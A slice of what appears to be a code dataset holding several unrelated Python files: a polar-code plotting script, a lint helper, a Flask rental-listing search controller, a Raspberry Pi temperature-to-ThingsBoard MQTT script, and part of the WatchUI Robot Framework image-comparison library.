lines=ml.getline(TPTfilep2,[x,z])\n#~ plt.plot(complist[1],lines[1][lines[0].index(1)],\"ro\")\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep3,[x,z])\n#~ plt.plot(complist[2],lines[1][lines[0].index(1)],\"ro\")\n\n#~ T=8\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep1,[x,z])\n#~ plt.plot(complist[0],lines[1][lines[0].index(8)],\"bo\")\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep2,[x,z])\n#~ plt.plot(complist[1],lines[1][lines[0].index(8)],\"bo\")\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep3,[x,z])\n#~ plt.plot(complist[2],lines[1][lines[0].index(8)],\"bo\")\n\n#~ T=32\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep1,[x,z])\n#~ plt.plot(complist[0],lines[1][lines[0].index(32)],\"go\")\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep2,[x,z])\n#~ plt.plot(complist[1],lines[1][lines[0].index(32)],\"go\")\n#~ (x,z)=(9,-2)\n#~ lines=ml.getline(TPTfilep3,[x,z])\n#~ plt.plot(complist[2],lines[1][lines[0].index(32)],\"go\")\n\n#==================UK\nT=0\nfileUK=\"./simresults/polarchannel_FERvsR_rateless_Det_Iter_retro_UK510in1024_T0_18-05-03_15-42-41.txt\"\nlines=ml.getline(fileUK,[x,y,z])\npoint=len(lines[0])\nMeanIters=pl.getMeanIter(ml.getline(fileUK,[13])[0],maxiters)\nplt.plot(lines[0],[float(R_p1-T)/(MeanIters[i]*N)*(1-10**lines[2][i]) for i in range(point)],'-c^',label='Decoding failure, $NR_1=$'+str(R_p1))\n\nchannel_plist=list(np.linspace(0.01,0.2,20))\nplt.plot(channel_plist,[pl.CapacityBSC(1,p) for p in channel_plist],\"k\",label=\"Capacity\")\n\n\n\nplt.ylabel('Throughput=($NR_1-T$)*(1-FER)/N*E[Iterations]')\nplt.xlabel('BSC(p)')\nplt.grid(True)\nplt.legend(loc=\"best\")\n\nplt.show()\n","sub_path":"Polar-slepian/V_22/maxtptscheme1plotter.py","file_name":"maxtptscheme1plotter.py","file_ext":"py","file_size_in_byte":11704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"222200857","text":"from os import path\nfrom subprocess import check_call\n\nROOT = path.realpath(path.abspath(path.join(path.dirname(__file__), '..')))\n\n\ndef run():\n check_call(['flake8', '--doctests'])\n\n\ndef fix():\n check_call(cwd=ROOT,\n args=[\n 'yapf', '-r', '-i',\n path.join(ROOT, 'logdna'),\n path.join(ROOT, 'scripts'),\n path.join(ROOT, 'tests')\n ])\n\n run()\n","sub_path":"scripts/lint.py","file_name":"lint.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"124781030","text":"from . import *\nfrom app.irsystem.models.helpers import *\nfrom app.irsystem.models.helpers import NumpyEncoder as NumpyEncoder\nfrom datetime import datetime\nfrom datetime import date\nfrom PyDictionary import PyDictionary\nimport string\nimport pandas as pd\nproject_name = \"Best Food Finder\"\nnet_id = \"April Ye yy459, Alan Huang ah2294, Geena Lee jl3257, Samuel Chen sc2992, Jack Ding jad493\"\nfeatures = ['name','description', 'neighbourhood_cleansed', 'bathrooms','bedrooms','price','maximum_nights', 'amenities', 'picture_url', 'listing_url', 'scores','comments','amenities_match']\n# 0 1 2 3 4 5 6 7 8 9 10 11 12\nfrom nltk.stem import PorterStemmer\nfrom nltk.sentiment import SentimentIntensityAnalyzer\nimport pickle\n\n# import sentiment analysis and stemming\n#sia = SentimentIntensityAnalyzer()\nps = PorterStemmer()\n\nloaded_model = pickle.load(open('app/irsystem/controllers/knnpickle_file', 'rb'))\nresult = loaded_model.predict([[1,1,2000,1125]])\n#print(sia.polarity_scores('i like this place'))\n\ndef similarity_result(data, keyword):\n\t'''\n\t@data : dataframe with pruned data\n\t@keyword : list of token in keyword\n\t'''\n\tkeyword = [w.lstrip() for w in keyword]\n\tkeywordsWithSynonyms = []\n\tdictionary=PyDictionary(keyword)\n\tfor i, w in enumerate(keyword):\n\t\tsynonyms = dictionary.getSynonyms()[i]\n\t\tkeywordsWithSynonyms.append(w)\n\t\tif not synonyms is None:\n\t\t\tkeywordsWithSynonyms += synonyms[w]\n\tkeywordsWithSynonyms = [ps.stem(w) for w in keywordsWithSynonyms]\n\treviews = getreview()\n\trank = []\n\tfor i, text in enumerate(data['description']):\n\t\t#perform jaccard\n\t\tscores = 0\n\t\t# remove punctuation\n\t\ttokens = text.strip(string.punctuation)\n\t\ttokens = tokens.lower().split()\n\t\t# stem the token\n\t\ttokens = [ps.stem(w) for w in tokens]\n\n\t\tintersection = len(list(set(tokens).intersection(set(keywordsWithSynonyms))))\n\t\tunion = (len(tokens) + len(keywordsWithSynonyms)) - intersection\n\t\tif (union == 0):\n\t\t\tprint(\"union is 0\")\n\t\tscores += float(intersection) / union\n\n\t\tlist_id = data.iloc[i]['id']\n\n\t\t#jaccard on amenities\n\t\tamenities = data.iloc[i]['amenities']\n\t\tamenities= [ps.stem(w.lower()) for w in amenities]\n\t\tintersection = len(list(set(amenities).intersection(set(keywordsWithSynonyms))))\n\t\tunion = (len(amenities) + len(keywordsWithSynonyms)) - intersection\n\t\tscores += float(intersection) / union\n\n\t\t# compute the similairty score for review also\n\t\tfor rev in reviews[reviews.listing_id == list_id]['comments']:\n\t\t\ttokens = rev.strip(string.punctuation)\n\t\t\ttokens = tokens.lower().split()\n\t\t\ttokens = [ps.stem(w) for w in tokens]\n\t\t\tintersection = len(list(set(tokens).intersection(set(keywordsWithSynonyms))))\n\t\t\tunion = (len(tokens) + len(keywordsWithSynonyms)) - intersection\n\t\t\tscores += float(intersection) / union\n\n\t\trank.append((scores, i))\n\trank = sorted(rank, key=lambda tup: tup[0], reverse=True)\n\t# get the sorted index\n\tranked_i = [doc[1] for doc in rank]\n\tscores = [doc[0] for doc in rank]\n\treturn data.iloc[ranked_i], scores\n\ndef getReviews(data):\n\ttotal_review = []\n\tfor i in range(len(data)):\n\t\treviews = getreview()\n\t\tlist_comment = []\n\t\tid = data.iloc[i]['id']\n\t\tfor rev in reviews[reviews.listing_id == id]['comments']:\n\t\t\tlist_comment.append(rev)\n\n\t\ttotal_review.append(list_comment)\n\tdata['comments'] = total_review\n\treturn data\n\ndef getAmen(data, query):\n\tquery = [w.lstrip() for w in query]\n\tlists = []\n\tfor i in range(len(data)):\n\t\tlist_amen = []\n\t\tfor amen in data.iloc[i]['amenities']:\n\t\t\tif(amen.lower() in query):\n\t\t\t\tlist_amen.append(amen)\n\t\tlists.append(list_amen)\n\n\tdata['amenities_match'] = lists\n\treturn data\n\n\n@irsystem.route('/search', methods=['GET'])\ndef search():\n\tprint(\"in search\")\n\tdf = getdata()\n\n\t#Todo: so far i am not sure how the query will be passed in and how many will be passed so i just put some dummy value\n\n\tquery = request.args.get('keywords')\n\n\tif not query:\n\t\tdata = []\n\t\toutput_message = 'No result'\n\t\treturn render_template('no_results.html')\n\n\t\t#return render_template('search.html', name=project_name, netid=net_id, output_message=output_message, data=data)\n\tprint(query)\n\toutput_message = \"Your search: \" + query\n\n\tprice = int(request.args.get('budget'))\n\tnbh = request.args.get('neighborhood')\n\tbedrooms = int(request.args.get('bed'))\n\tbathrooms = int(request.args.get('bath'))\n\tstart_date = datetime.strptime(request.args.get('start_date'), '%Y-%m-%d')\n\tend_date = datetime.strptime(request.args.get('end_date'), '%Y-%m-%d')\n\ttoday_date = datetime.strptime(date.today().strftime('%Y-%m-%d'), '%Y-%m-%d')\n\ttime = (end_date - start_date).days\n\tstart_date_check = (start_date - today_date).days\n\tprint(start_date)\n\tprint('------')\n\tprint(today_date)\n\tif (time < 0 or start_date_check < 0):\n\t\toutput_message = \"The date you inputted was invalid,\"\n\t\tif start_date_check < 0:\n\t\t\toutput_message += \" start date must be after today's date.\"\n\t\telif time < 0:\n\t\t\toutput_message += \" end date must be after start date.\"\n\t\treturn render_template('no_results.html', output_message=output_message)\n\n\t# print(bedrooms)\n\t# print(bathrooms)\n\t# print(time)\n\tprice /= time\n\tknn = False\n\tif not nbh:\n\t\tnbh = loaded_model.predict([[bathrooms,bedrooms,price,time]])[0]\n\t\toutput_message = ''\n\t\tknn = True\n\tpruned_data = df[(df.neighbourhood_cleansed == nbh) & (df.price <= price) & (df.bedrooms >= bedrooms) & (df.bathrooms >= bathrooms) & (df.maximum_nights >= time)]\n\tif (len(pruned_data) == 0):\n\t\tpruned_data = df[(df.neighbourhood_cleansed == nbh) & (df.bedrooms >= bedrooms) & (df.bathrooms >= bathrooms) & (df.maximum_nights >= time)]\n\t\toutput_message = 'No results for your query, but you might like these!'\n\t\tif (len(pruned_data) == 0):\n\t\t\tpruned_data = df[(df.neighbourhood_cleansed == nbh)]\n\t\t\toutput_message = 'No results for your query, but you might like these!'\n\n\tres_list, scores= similarity_result(pruned_data, keyword=query.lower().split(','))\n\tres_list = res_list[:5]\n\tscores = scores[:5]\n\tres_list['scores'] = scores\n\tif len(scores) > 0:\n\t\tres_list['scores'] = res_list['scores'].round(3)\n\n\t#print(res_list)\n\tres_list = getReviews(res_list)\n\t#print(res_list)\n\tprint(res_list['comments'])\n\n\tprint(res_list['scores'])\n\n\n\t# if jaccard is 0\n\tif(len(res_list) != 0 and scores[0] == 0):\n\t\tres_list = res_list.sort_values('price')\n\tres_list = getAmen(res_list, query.lower().split(','))\n\tres_list = res_list[features]\n\n\n\tfor index, amen_list in res_list['amenities'].items():\n\t\tres_list['amenities'][index] = list(set(amen_list).difference(set(res_list['amenities_match'][index])))\n\n\t#res_list['maximum_nights'] = pd.to_numeric(res_list['maximum_nights'], errors='coerce')\n\t#res_list['bedrooms'] = pd.to_numeric(res_list['bedrooms'], errors='coerce')\n\t#res_list['bedrooms'].astype(int)\n\t#res_list['bathrooms'] = pd.to_numeric(res_list['bathrooms'], errors='coerce')\n\t#res_list['price'] = pd.to_numeric(res_list['price'], errors='coerce')\n\n\t#print(res_list)\n\n\n # description\n # neighbourhood_cleansed\n # bathrooms\n # bedrooms\n # price\n # maximum_nights\n\tif(len(res_list) == 0):\n\t\toutput_message = 'No results for your query'\n\tif(knn == True):\n\t\toutput_message += ' Recommended neighborhood: ' + nbh\n\treturn render_template('results.html', name=project_name, netid=net_id, output_message=output_message, data=res_list.values.tolist())\n\n@irsystem.route('/', methods=['GET'])\ndef home():\n\tprint(\"in home\")\n\treturn render_template('search.html', name=project_name, netid=net_id)\n","sub_path":"app/irsystem/controllers/search_controller.py","file_name":"search_controller.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"536698231","text":"# Stolen and modified from https://thingsboard.io/docs/samples/raspberry/temperature/\n\nimport os\nimport time\nimport sys\nimport Adafruit_DHT as dht\nimport paho.mqtt.client as mqtt \nimport json\n\nTHINGSBOARD_HOST = 'demo.thingsboard.io'\n\n# Access Token is created/accessed from the 'Devices' section on thingsverse website \nACCESS_TOKEN = 'dDynH8yqU5uumM2KU94A'\n\n# Data capture and upload interval in seconds. Less interval will eventually hang the DHT22.\nINTERVAL=2\n\nsensor1_data = {'temperature1': 0, 'humidity1': 0}\nsensor2_data = {'temperature2': 0, 'humidity2': 0}\n\nnext_reading = time.time() \n\nclient = mqtt.Client()\n\n# Set access token\nclient.username_pw_set(ACCESS_TOKEN)\n\n# Connect to ThingsBoard using default MQTT port and 60 seconds keepalive interval\nclient.connect(THINGSBOARD_HOST, 1883, 60)\n\nclient.loop_start()\n\ntry:\n while True:\n humidity1,temperature1 = dht.read_retry(dht.DHT11, 14) #14 because the sensor is hooked up to GPIO14 \n humidity1 = round(humidity1, 2)\n temperature1 = round(temperature1, 2)\n print(\"Temperature1: %-3.1f C\" % temperature1)\n print(\"Humidity1: %-3.1f %%\" % humidity1)\n sensor1_data['temperature1'] = temperature1\n sensor1_data['humidity1'] = humidity1\n\n #humidity2,temperature2 = dht.read_retry(dht.DHT11, 2) #2 because the sensor is hooked up to GPIO2 \n #humidity2 = round(humidity2, 2)\n #temperature2 = round(temperature2, 2)\n #print(\"Temperature2: %-3.1f C\" % temperature2)\n #print(\"Humidity2: %-3.1f %%\" % humidity2)\n #sensor2_data['temperature2'] = temperature2\n #sensor2_data['humidity2'] = humidity2\n\n # Sending humidity and temperature data to ThingsBoard\n client.publish('v1/devices/me/telemetry', json.dumps(sensor1_data), 1)\n #client.publish('v1/devices/me/telemetry', json.dumps(sensor2_data), 1)\n\n next_reading += INTERVAL\n sleep_time = next_reading-time.time()\n if sleep_time > 0:\n time.sleep(sleep_time)\nexcept KeyboardInterrupt:\n pass\n\nclient.loop_stop()\nclient.disconnect()","sub_path":"RpiTempSense.py","file_name":"RpiTempSense.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569035492","text":"import csv\nimport os\nimport time\n\nimport cv2 as cv\nimport pandas as pd\nfrom robot.libraries.BuiltIn import BuiltIn, RobotNotRunningError\nfrom skimage.metrics import structural_similarity\n\nimport imutils\n\n\nclass WatchUI:\n \"\"\"WatchUI - Custom library for comparing images with use in Robot Framework.\n\n = Table of Contents =\n\n - `Usage`\n - `Importing`\n - `Examples`\n - `Keywords`\n\n = Usage =\n\n This library allows for automated visual testing of web frontends.\n Currently, this library is not officialy supported, so best way is to\n clone the repository and copy the WatchUI.py library file into your project and then\n import it - see Importing section.\n\n However, you can also install it via command *pip install WatchUI* and then import it.\n\n *IMPORTANT*: When using keywords of this library, please remember, that screenshots have to have same resolution!\n\n = Examples =\n Import library\n | `Library` | | outputs_folder= | ssim_basic= |\n\n Compare Images\n | Compare Images | path1 | path2 | save_folder= | ssim= |\n\n \"\"\"\n\n save_folder_path = \"../Outputs\"\n starts_ssim = 1.0\n starts_format_image = \"png\"\n\n def __init__(self, outputs_folder=save_folder_path, ssim_basic=starts_ssim, format_image=starts_format_image):\n \"\"\"Library can be imported either with default output folder and set lowest limit of difference between images (ssim), or\n you can provide your own values.\n\n Keyword Arguments:\n\n outputs_folder {str} -- path, where you want to save images with highlighted differences (default: \"../Outputs\")\n\n ssim_basic {float} -- threshold value in the interval (0, 1>. Tests are passed, if ssim value returned by keyword test functions is bigger than this (default: 1.0)\n\n format_image {str} -- Format for saving picture/screenshot (png, jpg etc.) Example: format_image=jpg (default: png)\n\n Examples:\n\n | =Setting= | =Value= | =Value= | =Value= | =Comment= |\n | Library | WatchUI.py | | | # Uses default values of keyword arguments |\n | Library | WatchUI.py | outputs_folder= | | # changes folder to different one |\n | Library | WatchUI.py | outputs_folder= | ssim_basic= | # changes output folder and ssim threshold |\n\n \"\"\"\n self.outputs_folder = outputs_folder\n self.ssim_basic = float(ssim_basic)\n self.image_format = str(format_image)\n # when libdoc builds documentation, this would lead to exception, since robot cannot access execution context,\n # since nothing really executes\n try:\n self.seleniumlib = BuiltIn().get_library_instance(\"SeleniumLibrary\")\n self.robotlib = BuiltIn().get_library_instance(\"BuiltIn\")\n except RobotNotRunningError as e:\n print(\n f\"If you are trying to build documentation, than this exception is just nuisance, skipping...\\n{str(e)}\"\n )\n pass\n self.score = None\n self.cnts = None\n self.img1 = None\n self.img2 = None\n\n def _check_dir(self, save_folder):\n \"\"\"Checks, if given exists, if not, creates it.\n\n Arguments:\n save_folder {str} -- path to \n \"\"\"\n if save_folder != self.save_folder_path:\n if os.path.exists(save_folder):\n self.save_folder = save_folder\n else:\n os.mkdir(save_folder)\n self.save_folder = save_folder\n else:\n if os.path.exists(self.outputs_folder):\n self.save_folder = self.outputs_folder\n else:\n os.mkdir(self.outputs_folder)\n self.save_folder = self.outputs_folder\n\n def _check_ssim(self, ssim):\n \"\"\"Checks, if ssim equals default, returns ssim value.\n\n Arguments:\n ssim {float} -- provided ssim value\n\n Returns:\n self.ssim {float} -- ssim value as instance attribute\n \"\"\"\n if ssim == 1.0:\n self.ssim = float(self.ssim_basic)\n else:\n self.ssim = float(ssim)\n\n def _check_image_format(self, format):\n \"\"\"Checks, which format setup for saving picture.\n\n Arguments:\n format_image {str} -- Image format as png, jpg etc.\n\n Returns:\n self.format {float} -- format for setup image type\n \"\"\"\n if str(format) == 'png':\n self.format = '.' + self.image_format\n else:\n self.format = '.' + format\n\n def _compare_images(self, path1, path2):\n \"\"\"Compares two images.\n\n Arguments:\n path1 { str } -- filepath to image 1\n path2 { str } -- filepath to image 2\n \"\"\"\n self.img1 = cv.imread(path1, 1)\n self.img2 = cv.imread(path2, 1)\n\n # convert to grey\n gray_img1 = cv.cvtColor(self.img1, cv.COLOR_BGR2GRAY)\n gray_img2 = cv.cvtColor(self.img2, cv.COLOR_BGR2GRAY)\n\n # SSIM diff Img\n (self.score, diff) = structural_similarity(gray_img1, gray_img2, full=True)\n diff = (diff * 255).astype(\"uint8\")\n\n # Threshold diff Img\n thresh = cv.threshold(diff, 0, 255, cv.THRESH_BINARY_INV | cv.THRESH_OTSU)[1]\n cnts = cv.findContours(thresh.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n self.cnts = imutils.grab_contours(cnts)\n\n def compare_images(\n self, path1, path2, save_folder=save_folder_path, ssim=starts_ssim, image_format=starts_format_image\n ):\n \"\"\"Comparing images\n\n It compares two images from the two paths and, if there are differences, saves the image with the errors highlighted\n in the folder: ../Save Image\n\n path1 = path to the first image to be compared\n path2 = path to the second image to be compared\n\n Example: Compare two image ../image1.png ../Image2.png\n \"\"\"\n self._check_dir(save_folder)\n self._check_ssim(ssim)\n self._check_image_format(image_format)\n\n if os.path.exists(path1) and os.path.exists(path2):\n # Compare image\n self._compare_images(path1, path2)\n\n # Create frame in diff area\n for c in self.cnts:\n (x, y, w, h) = cv.boundingRect(c)\n cv.rectangle(self.img1, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv.rectangle(self.img2, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n # Show image\n\n if float(self.score) < self.ssim:\n self.robotlib.log_to_console(self.ssim)\n self.robotlib.log_to_console(self.score)\n cv.imwrite(\n self.save_folder + \"/Img\" + str(time.time()) + self.format, self.img2\n )\n self.robotlib.fail(\"*INFO* Save file with difference\")\n else:\n img_diff = cv.hconcat([self.img1, self.img2])\n time_ = str(time.time())\n self.seleniumlib.capture_page_screenshot(\n save_folder + \"/Img\" + time_ + self.format\n )\n cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n self.robotlib.log_to_console(\n \"Image has diff: {} \".format(self.score)\n )\n else:\n raise AssertionError(\"Path doesnt exists\")\n\n def compare_screen(self, path1, save_folder=save_folder_path, ssim=starts_ssim, image_format=starts_format_image):\n \"\"\"\tCompare the already save image with the browser screen\n\n Compares the already saved image with the screen that is on the screen. If there is a difference, it saves the\n highlighted image to the: ../Save Image\n\n path1 = path to the image to be compared to screen\n\n Example: Compare screen ../image1.png\n \"\"\"\n self._check_dir(save_folder)\n self._check_ssim(float(ssim))\n self._check_image_format(image_format)\n save_folder = self.save_folder\n self.seleniumlib.capture_page_screenshot(save_folder + \"/testscreen.png\")\n path2 = save_folder + \"/testscreen.png\"\n if os.path.exists(path1):\n if os.path.exists(path2):\n # Compare image\n self._compare_images(path1, path2)\n\n # Create frame in diff area\n for c in self.cnts:\n (x, y, w, h) = cv.boundingRect(c)\n cv.rectangle(self.img1, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv.rectangle(self.img2, (x, y), (x + w, y + h), (0, 0, 255), 2)\n # Show image\n\n self.robotlib.log_to_console(self.ssim)\n if float(self.score) < self.ssim:\n self.robotlib.log_to_console(self.ssim)\n img_diff = cv.hconcat([self.img1, self.img2])\n time_ = str(time.time())\n score_percen = float(self.score) * 100\n self.seleniumlib.capture_page_screenshot(\n save_folder + \"/Img\" + time_ + self.format\n )\n cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n self.robotlib.fail(\"Image has diff: {} %\".format(score_percen))\n else:\n img_diff = cv.hconcat([self.img1, self.img2])\n time_ = str(time.time())\n self.seleniumlib.capture_page_screenshot(\n save_folder + \"/Img\" + time_ + self.format\n )\n cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n self.robotlib.log_to_console(\n \"Image has diff: {} \".format(self.score)\n )\n else:\n raise AssertionError(\"Path2 doesnt found:\" + path2)\n else:\n raise AssertionError(\"Path1 doesnt found\" + path1)\n if os.path.exists(save_folder + \"/testscreen.png\"):\n os.remove(save_folder + \"/testscreen.png\")\n\n def create_area(\n self, x1, y1, x2, y2, save_folder=save_folder_path, screen_name=\"screen\", image_format=starts_format_image\n ):\n \"\"\" Creates a cut-out from the screen\n\n Creates a cut-out from the screen that is on screen and saves it in the folder: ../Create area\n\n x1 a y1 = x and y coordinates for the upper left corner of the square\n x2 and y2 = x and y coordinates for the bottom right corner of the square\n\n Example: Compare making area 0 0 25 25\n \"\"\"\n self._check_dir(save_folder)\n save_folder = self.save_folder\n self._check_image_format(image_format)\n\n self.seleniumlib.capture_page_screenshot(save_folder + '/testscreen.png')\n img = save_folder + '/testscreen.png'\n img_crop = cv.imread(img)\n crop_img = img_crop[\n int(x1): int(y2), int(y1): int(x2)\n ] # Crop from {x, y, w, h } => {0, 0, 300, 400}\n if screen_name == \"screen\":\n cv.imwrite(save_folder + '/screen' + str(time.time()) + self.format, crop_img)\n else:\n cv.imwrite(save_folder + '/' + screen_name + self.format, crop_img)\n\n def create_screens(\n self, *resolution, save_folder=save_folder_path, screen_name=\"screen\", image_format=starts_format_image\n ):\n \"\"\" Creates a screenshot on the screen\n\n Creates a screenshot on the screen, that corresponds to the specified resolution, so it is possible to create on one\n page an infinite number of screens with different resolutions.\n Screens are stored in the folder: ../Create rescreens\n\n *resolutin = The specified resolution in width and height format, you can enter as many as needed\n\n Warning: When you create one screen, name will be screen.png, but when you create more than one screen from same 4\n page, name will be screen screen_name_width_height.png\n\n Example: compare making rescreens 800 600 1280 800 1440 900 Creates 3 screens in 800x600 1280x800 and 1440x90\n \"\"\"\n self._check_dir(save_folder)\n save_folder = self.save_folder\n self._check_image_format(image_format)\n\n leng_reso = len(resolution)\n if leng_reso % 2 == 0:\n if (leng_reso / 2) == 1:\n self.seleniumlib.set_window_size(int(resolution[0]), int(resolution[1]))\n time.sleep(1)\n self.seleniumlib.capture_page_screenshot(\n save_folder\n + \"/\"\n + screen_name\n + self.format\n )\n else:\n x = leng_reso / 2\n i = 0\n a = 0\n while i < x:\n width = int(resolution[0 + a])\n height = int(resolution[1 + a])\n self.seleniumlib.set_window_size(width, height)\n time.sleep(1)\n self.seleniumlib.capture_page_screenshot(\n save_folder\n + \"/\"\n + screen_name\n + str(width)\n + \"x\"\n + str(height)\n + self.format\n )\n a += 2\n i += 1\n else:\n raise AssertionError(\"Bad numbers of resolution\")\n\n def compare_screen_areas(\n self, x1, y1, x2, y2, path1, save_folder=save_folder_path, ssim=starts_ssim, image_format=starts_format_image\n ):\n \"\"\"Creates a cut-out from the screen\n\n Creates a cut-out from the screen that is on the screen and compares it to a previously created\n\n x1 and y1 = x and y coordinates for the upper left corner of the square\n x2 and y2 = x and y coordinates for the bottom right corner of the square\n path1 = Path to an already created viewport with which we want to compare the viewport created by us\n\n Example: Compare screen area 0 0 25 25 ../Crop_Image1.png Creates Crop_Image1.png from 0, 0, 25, 25\n \"\"\"\n self._check_dir(save_folder)\n self._check_ssim(ssim)\n self._check_image_format(image_format)\n save_folder = self.save_folder\n self.seleniumlib.capture_page_screenshot(save_folder + '/test1.png')\n path2 = save_folder + '/test1.png'\n\n if os.path.exists(path1):\n if os.path.exists(path2):\n # load img\n img1 = cv.imread(path1, 1) # img from docu\n img2 = cv.imread(path2, 1) # img from screenshot\n\n # convert to grey\n gray_img1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n gray_img2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n\n # spliting area\n crop_img = gray_img2[\n int(x1): int(y2), int(y1): int(x2)\n ] # Crop from {x, y, w, h } => {0, 0, 300, 400}\n\n # SSIM diff img\n (self.score, diff) = structural_similarity(\n gray_img1, crop_img, full=True\n )\n diff = (diff * 255).astype('uint8')\n\n # Threshold diff img\n thresh = cv.threshold(\n diff, 0, 255, cv.THRESH_BINARY_INV | cv.THRESH_OTSU\n )[1]\n cnts = cv.findContours(\n thresh.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE\n )\n cnts = imutils.grab_contours(cnts)\n\n crop_img_color = img2[int(x1): int(y2), int(y1): int(x2)]\n # Create frame in diff area\n for c in cnts:\n (x, y, w, h) = cv.boundingRect(c)\n cv.rectangle(img1, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv.rectangle(crop_img_color, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n # Show image\n if float(self.score) < self.ssim:\n self.robotlib = BuiltIn().get_library_instance('BuiltIn')\n img_diff = cv.hconcat([img1, crop_img_color])\n time_ = str(time.time())\n self.seleniumlib.capture_page_screenshot(\n save_folder + '/img' + time_ + '.png'\n )\n cv.imwrite(save_folder + '/img' + time_ + self.format, img_diff)\n self.robotlib.fail('Image has diff: {} '.format(self.score))\n score_percen = float(self.score) * +100\n self.robotlib.fail('Image has diff: {} %'.format(score_percen))\n else:\n img_diff = cv.hconcat([self.img1, self.img2])\n time_ = str(time.time())\n self.seleniumlib.capture_page_screenshot(\n save_folder + \"/Img\" + time_ + self.format\n )\n cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n self.robotlib.log_to_console(\n \"Image has diff: {} \".format(self.score)\n )\n else:\n raise AssertionError(\"New screen doesnt exist anymore\")\n else:\n raise AssertionError(\"You put bad path\")\n if os.path.exists(save_folder + '/test1.png'):\n os.remove(save_folder + '/test1.png')\n\n def compare_screen_without_areas(\n self, path1, *args, save_folder=save_folder_path, ssim=starts_ssim, image_format=starts_format_image\n ):\n \"\"\"\n Compares two pictures, which have parts to be ignored\n x1 and y1 = x and y coordinates for the upper left corner of the ignored area square\n x2 and y2 = x and y coordinates for the lower right corner of the square of the ignored part\n\n Attention! It is always necessary to enter in order x1 y1 x2 y2 x1 y1 x2 y2 etc ...\n\n Compare screen without areas ../Image1.png 0 0 30 40 50 50 100 100\n Creates 2 ignored parts at 0,0, 30,40 and 50, 50, 100, 100\n \"\"\"\n self._check_dir(save_folder)\n self._check_ssim(ssim)\n self._check_image_format(image_format)\n save_folder = self.save_folder\n\n self.seleniumlib.capture_page_screenshot(save_folder + \"/test1.png\")\n path2 = save_folder + \"/test1.png\"\n if os.path.exists(path1) and os.path.exists(path2):\n lt = len(args)\n img1 = cv.imread(path1, 1)\n img2 = cv.imread(path2, 1)\n if lt % 4 == 0:\n x = lt / 4\n self.robotlib.log_to_console(x)\n i = 0\n a = 0\n while i < x:\n color = (0, 0, 0)\n x1 = int(args[0 + a])\n y1 = int(args[1 + a])\n x2 = int(args[2 + a])\n y2 = int(args[3 + a])\n\n cv.rectangle(img1, (x1, y1), (x2, y2), color, -1)\n cv.rectangle(img2, (x1, y1), (x2, y2), color, -1)\n a += 4\n i += 1\n cv.namedWindow(\"image\", cv.WINDOW_NORMAL)\n\n # convert to grey\n gray_img1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n gray_img2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n\n # SSIM diff Img\n (self.score, diff) = structural_similarity(\n gray_img1, gray_img2, full=True\n )\n diff = (diff * 255).astype(\"uint8\")\n\n # Threshold diff Img\n thresh = cv.threshold(\n diff, 0, 255, cv.THRESH_BINARY_INV | cv.THRESH_OTSU\n )[1]\n cnts = cv.findContours(\n thresh.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE\n )\n cnts = imutils.grab_contours(cnts)\n\n # Create frame in diff area\n for c in cnts:\n (x, y, w, h) = cv.boundingRect(c)\n cv.rectangle(img1, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv.rectangle(img2, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n # Show image\n if float(self.score) < self.ssim:\n img_diff = cv.hconcat([img1, img2])\n time_ = str(time.time())\n self.seleniumlib.capture_page_screenshot(\n save_folder + \"/Img\" + time_ + self.format\n )\n cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n self.robotlib.fail(\"Image has diff: {} \".format(self.score))\n else:\n img_diff = cv.hconcat([img1, img2])\n time_ = str(time.time())\n self.seleniumlib.capture_page_screenshot(\n save_folder + \"/Img\" + time_ + self.format\n )\n cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n self.robotlib.log_to_console(\n \"Image has diff: {} \".format(self.score)\n )\n else:\n raise AssertionError(\"Path doesnt exists\")\n\n def compare_screen_get_information(\n self,\n path1,\n save_folder=save_folder_path,\n folder_csv=\"../CSV_ERROR\",\n ssim=starts_ssim,\n image_format=starts_format_image\n ):\n \"\"\"\tCompare the already save image with the browser screen\n\n Compares the already saved image with the screen that is on the screen. If there is a difference, it saves the\n highlighted image to the: ../Save Image and making csv file with coordinates and elements which exist on this\n coordinates\n\n path1 = path to the image to be compared to screen\n\n Example: Compare screen ../image1.png\n \"\"\"\n self._check_dir(save_folder)\n self._check_dir(folder_csv)\n self._check_ssim(ssim)\n self._check_image_format(image_format)\n save_folder = self.save_folder\n # Making screen\n self.seleniumlib.capture_page_screenshot(save_folder + \"/test1.png\")\n path2 = save_folder + \"/test1.png\"\n if os.path.exists(path1):\n if os.path.exists(path2):\n # load Img\n self._compare_images(path1, path2)\n\n # write coordinate\n 